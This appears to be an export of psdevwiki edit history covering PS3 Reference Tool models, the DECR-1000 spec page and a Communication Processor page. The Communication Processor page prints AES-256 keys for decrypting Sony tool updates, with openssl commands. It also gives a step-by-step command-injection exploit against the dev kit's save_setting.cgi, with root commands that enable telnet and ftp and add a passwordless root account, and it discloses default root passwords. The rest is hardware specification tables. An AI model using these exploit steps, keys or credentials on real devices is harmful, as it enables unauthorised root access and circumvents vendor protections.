Other<br /> |-<br /> | [[DECR-1000|DECR-1000(A/J)]] || 0x01 || [[TMU-520]] || [[K9F2G08U0M | 2x 256MB NAND]] || [[CXD2973AGB-4]] || [[CXR713F120A]] || [[TCP-520]] || 400GB || 400GB || ?0x00? || 2 ({{NO}} CEC) || {{NO}} || {{90nm}} || {{90nm}} || 4 + 2 extra || 4 (1 for dbg.) || {{YES}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} &lt;!-- external antenna --&gt; || 2006 || =&gt;[[1.00 DECR|1.0.0]]&lt;br/&gt;or &lt;br/&gt;=&gt;[[2.30 DECR|2.3.0]] (since 1/2009) || [[0.08]] || contains prototype components, hardware is identical to [[DEH-R1040]] with a different label/model name.<br /> |-<br /> | [[DECR-1400|DECR-1400A/J]] || 0x09 || [[DEB-001]] || [[&lt;!--?--&gt;S29GL128N90TFIR2|1x 16MB NOR]] || ?[[CXD2984GB]]? || [[CXR713120-201GB]] || (via SB) || - || 160 GB || ?0x0A? || 1 ({{NO}} CEC) || {{PARTIAL}} || {{45nm}} || {{65nm}} || 4 || 2 (1 for dbg.) || {{NO}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} || 6/2009 || =&gt;[[2.60 DECR|2.6.0]] || =&gt;?[[2.60 DECR|2.60]]? || same case as retail PS3<br /> |-<br /> |}<br /> <br /> Differences between the [[DECR-1000|1000]] and [[DECR-1400|1400]]:<br /> *[[DECR-1000]]:<br /> ** Gb-DEVLAN is connected to the [[Communication Processor]]<br /> ** With a pre (or equal to) [[0.85.010]] bootrom you do have two [[HDMI]] outputs.<br /> &lt;!-- ** Could be turned into a {{SD}} System Debugger by changing the [[South Bridge]] firmware, adding a special CP Sister Board and using a specific {{SD}} firmware --&gt;<br /> ** '''Not all DECR-1000 are equal! Despite Sony's documentation claiming otherwise, DECR-1000 units with RSX rom version b07 and above such as refurbished/serviced units (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;'''.<br /> <br /> * [[DECR-1400]]: <br /> ** You cannot use Performance monitoring functions (libperf, libprof, tuner for PS3)<br /> *** for SPU: PC sampling, Performance counters, Bookmark, RAW SPU support<br /> *** for [[RSX]]: Signal Trace, User Events.<br /> ** DECI3 is limited to one protocol and a data exchange size of 65535 bytes.<br /> ** The two [[GbLAN]]´s share the same MAC ID and cannot be used in the same network segment.<br /> ** Gb-DEVLAN is connected to [[South Bridge]].<br /> &lt;br/&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&diff=43011 Communication Processor 2016-10-05T02:13:02Z <p>Mathieulh: /* Step 3 - Profit ! */</p> <hr /> <div>{{Wikify}}<br /> <br /> == Hardware ==<br /> [[CXD9790GG]] (I/O)<br /> <br /> [[TCP-510]] (Board ID on the DEH models such as [[DEH-R1040]])<br /> <br /> [[TCP-520]] (Board ID on the [[DECR-1000]])<br /> <br /> ([[TCP-510]] matches the TMU-510 motherbord, while [[TCP-520]] matches the TMU-520 motherboard)<br /> The PSP DTP-T1000 unit also sports a communication processor but it does not come as a separate board, the hardware is integrated/soldered directly to the motherboard, unlike the PS3 CP, it does not run the firmware from RAM (the PS3 CP copies the firmware from ROM to RAM at boot so changes are, by default not persistant) and therefore writes files directly to flash.<br /> <br /> CEB units feature a PCI slot capable of harboring a CP daughterboard (Sony used such setups as System Debuggers before DEH units came along), CP boards switched to a proprietary interface and shipped to 3rd parties starting with DEH-Rx<br /> <br /> == Software ==<br /> <br /> === De/Encrypt Communication Processor updates ===<br /> This is how to decrypt/encrypt Playstation 3 Reference Tool Communication Processor updates. (use this knowledge wisely)<br /> <br /> This was achieved by exploiting the communication processor firmware and gaining root privileges on the running Montavista Linux.<br /> The key for the CP update packages is located within the toolupdatedec binary located at /usr/local/sony/bin/toolupdatedec<br /> <br /> The update packages are just tar.gz packages encrypted using AES256CBC Here is the syntax to decrypt them :<br /> <br /> * The first 16 bytes of the package is the IV, the Second 16 bytes is the hash of the decrypted package.<br /> <br /> So use this Syntax after skipping the first 32 bytes of the file: <br /> <br /> {{keyboard|content=openssl aes-256-cbc -in reftool_cp_xxx.bin -K E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F -iv the_first_16_bytes_of_the_file -d &gt; dec.tgz<br /> }}<br /> <br /> PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary.<br /> <br /> The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000<br /> <br /> {{keyboard|content=openssl aes-256-cbc -in psptoolupdate.bin -K A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB -iv the_first_16_bytes_of_the_file -d &gt; dec.tgz<br /> }}<br /> <br /> P.S. If you have any trouble extracting the tarballs, try using Linux.<br /> <br /> - Mathieulh<br /> <br /> Because a picture is worth a thousand words, here is one: <br /> &lt;gallery&gt;<br /> File:CP_ROOT.jpg|Root on the Communication Processor<br /> &lt;/gallery&gt;<br /> <br /> === Proper De/Encrypting of CP Updates ===<br /> *source code [http://gitorious.ps3dev.net/cp-update-crypt cp-update-crypt] [[Gitorious]]<br /> <br /> == Exploiting the Communication Processor ==<br /> <br /> After initially deciding not to release the cgi exploit in case Sony may release yet another hardware based on the [[CXD9790GG]] MIPS processor, no such hardware (to my knowledge) ever came out; thus I am now documenting this exploit:<br /> <br /> &lt;div style=&quot;border: 5px solid red; padding: 5px;&quot;&gt;<br /> '''Editor's note:''' The following &lt;html&gt; code has been edited for a better experience through displaying on this wiki page. The following has ben replaced... ([[User:Roxanne|Roxanne]] ([[User talk:Roxanne|talk]]) - 03&lt;sup&gt;rd&lt;/sup&gt; March 2016 - 21:50 GMT+1)<br /> * &lt;nowiki&gt;&lt;source lang=&quot;xml&quot;&gt; instead of &lt;pre&gt;&lt;/nowiki&gt;<br /> * &lt;nowiki&gt;&lt;title&gt;Save and load&lt;/title&gt; instead of &lt;title&gt;Save &amp; load&lt;/title&gt;&lt;/nowiki&gt;<br /> * &lt;nowiki&gt;&lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt; instead of &lt;div class=&quot;title&quot;&gt;Save &amp; load&lt;/div&gt;&lt;/nowiki&gt;<br /> <br /> View here to look for the original code... (by [[User:Mathieulh|Mathieulh]])<br /> * http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&amp;oldid=41067#Exploting_the_Communication_Processor<br /> * http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&amp;oldid=41073#Exploting_the_Communication_Processor<br /> &lt;/div&gt;<br /> <br /> === Step 1 - The Development Tool Web panel ===<br /> <br /> The first thing you want to do, assuming you already have your Development Tool properly setup, is to go to this page http://devtool/cgi-bin/admin/save_setting.cgi?lang=english (you will want to replace &quot;devtool&quot; by the ip/hostname of your Development Tool), you may also reach this page by simply<br /> going to the &quot;Save &amp; load&quot; page of your tool's panel.<br /> <br /> This page is actually the front end for a cgi script that can be used to save and/or load your development tool's configuration settings into/from a file. <br /> Once on the page, it is fairly easy to do a right click on your favorite web browser and save it as source, assuming you did not mistakenly save the top.cgi page instead, this is the result you should get: <br /> <br /> &lt;source lang=&quot;xml&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save and load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;&lt;br&gt;&lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;save_setting.cgi?lang=english&quot; method=&quot;post&quot;<br /> enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;/var/ps3tool.conf&quot;&gt;<br /> ps3tool.conf<br /> &lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;/cgi-bin/contents.cgi?lang=english&quot;&gt;<br /> Top<br /> &lt;/a&gt;<br /> &lt;!--<br /> &amp;nbsp;<br /> &lt;a href=&quot;/help/english/save_setting.html&quot; target=&quot;_blank&quot;&gt;<br /> Help<br /> &lt;/a&gt;<br /> --&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/source&gt;<br /> <br /> <br /> Besides the obvious security hazard in the fact that the httpd service runs as root, the exploit itself still remains hidden unless you get the whole save_setting.cgi file and look into the save_setting_file and the rename_settingfile functions (I'll let you dig into these deeper in your own time)<br /> <br /> === Step 2 - Doing simple modifications ===<br /> <br /> Assuming you have saved the right source to your computer, you then need, for this exploit to work, to perform small modifications to those <br /> <br /> What you really want to modify is this part: <br /> &lt;pre&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/pre&gt;<br /> <br /> Into this part: <br /> &lt;pre&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/pre&gt;<br /> <br /> As you can see, the change is subtle, but it allows you input actual text instead of sending a file<br /> <br /> Of course since you are not going to use this modified page from the actual Communication Processor's web panel, you need to perform a few more obvious changes to the page (you need to put the hard path to hyperlinks to the .cgi and .conf files)<br /> So, change all the hyperlinks to their full path, for example '''action=&quot;save_setting.cgi?lang=english&quot;''' becomes '''action=&lt;nowiki&gt;&quot;http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english&quot;&lt;/nowiki&gt;'''<br /> <br /> To the lazy ones, this is what the result should look like (change the hyperlinks accordingly)<br /> <br /> &lt;source lang=&quot;xml&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save and load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;&lt;br&gt;&lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english&quot; method=&quot;post&quot;<br /> enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;http://DEVTOOL.IP.HERE/var/ps3tool.conf&quot;&gt;<br /> ps3tool.conf<br /> &lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;http://DEVTOOL.IP.HERE/cgi-bin/contents.cgi?lang=english&quot;&gt;<br /> Top<br /> &lt;/a&gt;<br /> &lt;!--<br /> &amp;nbsp;<br /> &lt;a href=&quot;/help/english/save_setting.html&quot; target=&quot;_blank&quot;&gt;<br /> Help<br /> &lt;/a&gt;<br /> --&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/source&gt;<br /> <br /> &lt;!-- waiting for approval... if not good/working just delete it<br /> {{Boxcode|content=&lt;syntaxhighlight lang=&quot;html5&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save &amp;amp; load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save &amp;amp; load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;<br /> &lt;br&gt;<br /> &lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;http://192.168.0.3/cgi-bin/admin/save_setting.cgi?lang=english&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Setting file&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;http://192.168.0.3/var/ps3tool.conf&quot;&gt;ps3tool.conf&lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Setting file&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Send text command<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Text command&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;http://192.168.0.3/cgi-bin/contents.cgi?lang=english&quot;&gt;Top&lt;/a&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/syntaxhighlight&gt;}}<br /> --&gt;<br /> <br /> === Step 3 - Profit ! ===<br /> <br /> You should now have a place in which you can input text in the page itself, the exploit works as follows, any command you sent (by pressing on the &quot;Setting&quot; button) preceded by &quot;; &quot; (do not include the quotes) will run as root on the Communication Processor, so here are the obvious commands you need to input in order to gain telnet and ftp access as well as to add a root account to the unit:<br /> <br /> Add a line to start telnet in inetd.conf (the line already exists in the original file but is commented)<br /> {{keyboard|content=; echo &gt;&gt;/etc/inetd.conf telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd }} <br /> Add a line to start ftpd in inetd.conf<br /> {{keyboard|content=; echo &gt;&gt;/etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd }}<br /> Restart inetd to apply the above changes<br /> {{keyboard|content=; /etc/init.d/inetd restart }}<br /> Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology on the DTP-T1000 the password to the root account is tAchyOn )<br /> {{keyboard|content=; echo &gt;&gt;/etc/passwd rt::0:0:root:/root:/bin/bash }}<br /> <br /> You may also output files given the right path (if you don't want to mess with ftp) the below example creates a ls.txt file containing a listing of all files on the CP at the Development panel's root<br /> {{keyboard|content=; ls -alR /* &gt; /usr/local/sony/www/html/ls.txt }}<br /> <br /> While sending all these commands (by clicking on the &quot;Setting&quot; button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal.<br /> <br /> Once you have dumped the development tool panel's files, or extracted those from updates, the exploit should be fairly obvious to you. Of course when this exploit was first discovered, we had no previous access to the files on the Communication Processor and had to initially take another route, which was to dump the Communication Processor's bootrom using hardware (the chip sits on a socket), discover and use the diagnostic panel/shell on it, find a way out of its sandbox and send (through very slow serial outputs) the content of the Communication Processor's memory (as it was running live), which incidentally contained a whole copy of the file system and allowed to look for an easier way in, eventually the toolupdatedec files from both the DTP-T1000 and TCP-520 (DECR-1000 CP) was dumped using this exploit, allowing to retrieve the keys and algorithms used to decrypt Communication Processor/Hardware Tool updates.<br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:Reference_Tool_models&diff=42795 Template:Reference Tool models 2016-09-19T11:33:27Z <p>Mathieulh: </p> <hr /> <div>{{ed right|Reference Tool models}}<br /> <br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Model !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Flash_(Hardware)|Flash]] !! [[South_Bridge|SB]] !! [[Syscon_Hardware|Syscon]] !! [[Communication Processor|CP]] !! [[Harddrive|BDemu HDD]] !! [[Harddrive|GameOS HDD]] !! [[Bluray_Drive|Bluray Drive]] !! [[HDMI | HDMI Ports]] !! [[Flash:OtherOS|OtherOS]] !! [[CELL BE]] !! [[RSX]] !! [[USB|USB&lt;br/&gt;Ports]] !! [[GbLAN | GbLan&lt;br/&gt;Ports]] !! [[MultiCardReader|Flash&lt;br/&gt;Readers]] !! Support:&lt;br /&gt;[[Emulation#pspemu|PSP]]&lt;br /&gt;[[PS2_Compatibility|PS2]]&lt;br /&gt;[[Emulation#ps1emu|PS1]] !! SA-&lt;BR /&gt;CD !! WiFi&lt;br/&gt;802.11&lt;BR /&gt;b/g !! [[SKU_Models#Datecode_/_Manufacturing_Date|SKU&lt;br/&gt;Release&lt;br/&gt;date]] !! [[System_Software|SDK/FW &lt;br/&gt;support]] !! [[Template:Metbootldr|downgradeable&lt;br/&gt;Min.&lt;br/&gt;praxis]] !! Other<br /> |-<br /> | [[DECR-1000|DECR-1000(A/J)]] || 0x01 || [[TMU-520]] || [[K9F2G08U0M | 2x 256MB NAND]] || [[CXD2973AGB-4]] || [[CXR713F120A]] || [[TCP-520]] || 400GB || 400GB || ?0x00? || 2 ({{NO}} CEC) || {{PARTIAL}} || {{90nm}} || {{90nm}} || 4 + 2 extra || 4 (1 for dbg.) || {{YES}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} &lt;!-- external antenna --&gt; || 2006 || =&gt;[[1.00 DECR|1.0.0]]&lt;br/&gt;or &lt;br/&gt;=&gt;[[2.30 DECR|2.3.0]] (since 1/2009) || &lt;[[0.85.009]] || contains prototype components, hardware is much closer to [[DEH-R1040]] than [[CECHAxx]].<br /> |-<br /> | [[DECR-1400|DECR-1400A/J]] || 0x09 || [[DEB-001]] || [[&lt;!--?--&gt;S29GL128N90TFIR2|1x 16MB NOR]] || ?[[CXD2984GB]]? || [[CXR713120-201GB]] || (via SB) || - || 160 GB || ?0x0A? || 1 ({{NO}} CEC) || {{PARTIAL}} || {{45nm}} || {{65nm}} || 4 || 2 (1 for dbg.) || {{NO}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} || 6/2009 || =&gt;[[2.60 DECR|2.6.0]] || =&gt;?[[2.60 DECR|2.60]]? || same case as retail PS3<br /> |-<br /> |}<br /> <br /> Differences between the [[DECR-1000|1000]] and [[DECR-1400|1400]]:<br /> *[[DECR-1000]]:<br /> ** Gb-DEVLAN is connected to the [[Communication Processor]]<br /> ** With a pre [[0.85.009]] bootrom you do have two [[HDMI]] outputs.<br /> &lt;!-- ** Could be turned into a {{SD}} System Debugger by changing the [[South Bridge]] firmware, adding a special CP Sister Board and using a specific {{SD}} firmware --&gt;<br /> ** '''Not all DECR-1000 are equal! Despite Sony's documentation claiming otherwise, DECR-1000 units with RSX rom version b07 and above such as refurbished/serviced units (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;'''.<br /> <br /> * [[DECR-1400]]: <br /> ** You cannot use Performance monitoring functions (libperf, libprof, tuner for PS3)<br /> *** for SPU: PC sampling, Performance counters, Bookmark, RAW SPU support<br /> *** for [[RSX]]: Signal Trace, User Events.<br /> ** DECI3 is limited to one protocol and a data exchange size of 65535 bytes.<br /> ** The two [[GbLAN]]´s share the same MAC ID and cannot be used in the same network segment.<br /> ** Gb-DEVLAN is connected to [[South Bridge]].<br /> &lt;br/&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=DECR-1000&diff=42794 DECR-1000 2016-09-19T11:29:36Z <p>Mathieulh: /* Specifications */</p> <hr /> <div>= DECR-1000(A/J) =<br /> <br /> == Specifications ==<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! [[:Category:Models|SubModels]]<br /> | [[DECR-1000A]] / [[DECR-1000J]]<br /> |-<br /> ! Type<br /> | 0x01<br /> |-<br /> ! Motherboard<br /> | [[TMU-520]]<br /> |-<br /> ! Flash Storage<br /> | [[K9F2G08U0M|2x 256MB NAND]]<br /> |-<br /> ! [[CELL BE]] / [[RSX]]<br /> | {{90nm}} / {{90nm}}<br /> |-<br /> ! [[South Bridge]]<br /> | [[CXD2973AGB-4]]<br /> |-<br /> ! [[Syscon Hardware|Syscon]]<br /> | [[CXR713F120A]]<br /> |-<br /> ! [[Communication Processor|CP]]<br /> | [[CXD9790GG]] [[TCP-520]]<br /> |-<br /> ! BDemu [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! GameOS [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! [[Bluray Drive]]<br /> | {{YES}}<br /> |-<br /> ! [[HDMI|HDMI Ports]]<br /> | 2<br /> |-<br /> ! [[:Category:Linux|OtherOS]]<br /> | {{PARTIAL}} (Only from [[System Firmware]] [[090.002 - DECR|0.90]] to [[096.002 - DECR|0.96]], not available in other firmwares)<br /> |-<br /> ! [[USB|USB Ports]]<br /> | 6<br /> |-<br /> ! [[GbLAN|GbLAN Ports]]<br /> | 4 (1 for debugger) <br /> |-<br /> ! Serial Ports<br /> | 1 (Hidden next to LAN(DEV) lan port, used in SYSCON emergency updates)<br /> |-<br /> ! [[MultiCardReader|Flash Readers]]<br /> | Yes<br /> |-<br /> ! [[PS2_Compatibility|PS2 mode]]<br /> | {{NO}} (No Emotion Engine or Graphic Synthesizer on the motherboard, no [[Emulation#ps2emu|ps2emu software]] in the official firmware)<br /> |-<br /> ! [[PS1_Compatibility|PS1 mode]]<br /> | {{NO}} (No [[Emulation#ps1emu|ps1emu software]] in the official firmware)<br /> |-<br /> ! [[SA-CD]]<br /> | {{NO}} (The Bluray Drive is compatible but no software exists to play the discs in Official Reference Tool firmwares)<br /> |-<br /> ! [[Wifi|WiFi802.11b/g]]<br /> | {{YES}}<br /> |-<br /> ! SKU Release date<br /> | 2006<br /> |-<br /> ! [[SCEI PS3 SDK|SDK]] / [[System Software|Firmware]] support<br /> | =&amp;gt;1.0.0&lt;br /&gt;=&amp;gt;1.6.0 when refurbished/serviced (RSX rom version isn't supported on older hypervisor)&lt;br /&gt;&amp;nbsp;&amp;nbsp;or&lt;br /&gt;=&amp;gt;2.3.0 (Since Jan 2009)<br /> |-<br /> ! [[Template:Metbootldr|downgradeable Min. praxis]]<br /> | 0.85.009<br /> |-<br /> ! Other<br /> | contains prototype components, hardware is much closer to [[DEH-R1040]] than [[CECHAxx]].<br /> |-<br /> ! [[Power Supply]] <br /> | nichihon [[ZSSR541iB]]<br /> * input: AC 100-240V 9.5-4A 50/60Hz (950-960 Watt)&lt;br /&gt;output:<br /> * DC+5V(Sub) 1.6A (8 W)<br /> * DC+3.3V 23A (75.9 W)<br /> * DC+5V 8.2A (41 W)<br /> * DC+12V 31.2A (374.4 W)&lt;!--// 2 labels exist: one stating 9.5-4A for whole range (brand unreadable), other only 9.5A (the highest current for the lowest supported voltage - &quot;nichihon&quot;) //--&gt;<br /> |}<br /> <br /> == Boards ==<br /> === Motherboard ===<br /> [[TMU-520]] [[1-871-645-11]], [[1-871-645-12]], [[1-871-645-13]] - Mainboard<br /> === SubBoards ===<br /> [[BMD-001]] [[1-871-575-11]] - Blu-ray drive controller board<br /> [[TAM-520]] [[1-871-636-11]] - Analog 4-ch. audio output<br /> [[TAV-520]] [[1-871-635-11]] - Analog AV out<br /> [[TBP-520]] [[1-871-644-11]] - Backplane for 2x SATA HDD + BD<br /> [[TCP-520]] [[1-871-646-11]] - Communication Processor board<br /> [[TEJ-520]] [[1-871-641-11]] - HDD Activity/Eject board<br /> [[TFL-520]] [[1-871-638-11]] - Front Panel LEDboard (GPI/GPO/Reset/Start...)<br /> [[TFP-520]] [[1-871-640-11]] - Front Panel Switchboard (GPI/GPO/Reset/Start...)<br /> [[TMR-520]] [[1-871-647-11]] - CP-helper board<br /> [[TMW-520]] [[0-347-825-02]] - Bt/Wifi board<br /> [[TSA-520]] [[1-871-639-11]] - BD PATA-&gt;SATA adapter<br /> [[TUU-520]] [[1-871-643-11]] - Front I/O (Foot-Sw/USB/CardReader)<br /> <br /> == Pictures ==<br /> &lt;Gallery&gt;<br /> File:DECR1000A-frontleft.jpg|[[DECR1000A]] - frontleft<br /> File:DECR1000A-front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A-topback.jpg|[[DECR1000A]] - topback<br /> File:DECR1000A-controller-top.jpg|[[DECR1000A]] - controller top<br /> File:DECR1000A-controller-back.jpg|[[DECR1000A]] - controller back<br /> <br /> File:DECR1000A - back.jpg|[[DECR1000A]] - back<br /> File:DECR1000A - back label.jpg|[[DECR1000A]] - back label<br /> File:DECR1000A - bottom.jpg|[[DECR1000A]] - bottom<br /> File:DECR1000A - front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A - front0.jpg|[[DECR1000A]] - front0<br /> File:DECR1000A - front1.jpg|[[DECR1000A]] - front1<br /> File:DECR1000A - front2.jpg|[[DECR1000A]] - front2<br /> File:DECR1000A - front3.jpg|[[DECR1000A]] - front3<br /> File:DECR1000A - front4.jpg|[[DECR1000A]] - front4<br /> File:DECR1000A - toplabel powerrating.jpg|[[DECR1000A]] - bottomlabel powerrating<br /> <br /> File:DECR-1000A - Nichicon ZSSR541iB 1-474-032-21 PSU labeling.jpg|[[DECR-1000A]] - Nichicon [[ZSSR541iB]] [[1-474-032-21]] [[Power Supply]] labeling<br /> &lt;/Gallery&gt;<br /> <br /> == Links ==<br /> <br /> [https://www.youtube.com/watch?v=lSnoCsZvQiM| Overview and the detailed explaination in French]<br /> &lt;br&gt;<br /> [https://mega.co.nz/#F!XcdAiZpb!-Zy5PmdUwDLKHAogZyvMuA| Pictures of the DECR-1000A boards]<br /> &lt;br&gt;<br /> [ftp://ip-240.net-80-236-71.issy.rev.numericable.fr/Multimedia/TEXT/Computers/Computer%20Architecture/PS3/Instruction_manual_e.pdf Instruction Manual]<br /> &lt;br&gt;<br /> https://fccid.io/AK8DEHR1000<br /> &lt;br&gt;<br /> https://fccid.io/pdf.php?id=686154<br /> <br /> == Comparison ==<br /> {{Reference Tool models}}<br /> <br /> <br /> {{Console Information}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh 